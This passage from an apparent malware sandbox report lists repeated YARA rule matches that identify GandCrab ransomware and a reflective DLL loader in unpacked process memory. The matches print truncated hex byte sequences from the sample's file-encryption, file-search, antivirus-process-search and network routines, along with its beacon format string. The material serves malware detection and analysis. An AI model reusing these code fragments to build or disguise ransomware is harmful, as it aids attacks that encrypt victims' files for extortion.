00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
15.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
15.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
15.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
15.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
15.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
15.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
20.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
20.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
30.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
30.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
20.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
20.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
30.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
30.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
20.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
20.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
30.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
30.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
27.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
27.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
27.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
27.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
27.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
27.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
25.3.wzltxa.exe.3a00000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
25.3.wzltxa.exe.3a00000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
25.3.wzltxa.exe.3a00000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.3.wzltxa.exe.3a00000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
25.3.wzltxa.exe.3a00000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.3.wzltxa.exe.3a00000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
40.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
40.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
40.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
40.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
40.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
40.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
0.2.mPNVrHIpyt.exe.f690000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0.2.mPNVrHIpyt.exe.f690000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0.2.mPNVrHIpyt.exe.f690000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0.2.mPNVrHIpyt.exe.f690000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.2.mPNVrHIpyt.exe.f690000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0.2.mPNVrHIpyt.exe.f690000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.2.mPNVrHIpyt.exe.f690000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 69 0F 8B 35 44 A1 69 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 69 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 69 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 69 0F 8B 35 10 A1 69 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 69 0F C7 44 24 1C 64 F4 69 0F C7 44 24 20 80 F4 69 0F C7 44 24 24 A0 F4 69 0F C7 44 24 28 BC F4 69 0F C7 44 24 2C D8 F4 69 0F C7 44 24 30 F0 F4 69 0F C7 44 24 34 04 F5 69 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 69 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 6A 0F C7 45 B8 BC 03 6A 0F C7 45 BC ...
22.2.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
22.2.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
22.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
22.2.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
22.2.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
22.2.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
22.2.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
33.0.wzltxa.exe.fbb0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
33.0.wzltxa.exe.fbb0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
33.0.wzltxa.exe.fbb0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
33.0.wzltxa.exe.fbb0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
33.0.wzltxa.exe.fbb0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
33.0.wzltxa.exe.fbb0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 BB 0F 8B 35 44 A1 BB 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 BB 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 BB 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 BB 0F 8B 35 10 A1 BB 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 BB 0F C7 44 24 1C 64 F4 BB 0F C7 44 24 20 80 F4 BB 0F C7 44 24 24 A0 F4 BB 0F C7 44 24 28 BC F4 BB 0F C7 44 24 2C D8 F4 BB 0F C7 44 24 30 F0 F4 BB 0F C7 44 24 34 04 F5 BB 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 BB 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 BC 0F C7 45 B8 BC 03 BC 0F C7 45 BC ...
28.3.wzltxa.exe.38a0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
28.3.wzltxa.exe.38a0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
28.3.wzltxa.exe.38a0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
28.3.wzltxa.exe.38a0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
28.3.wzltxa.exe.38a0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
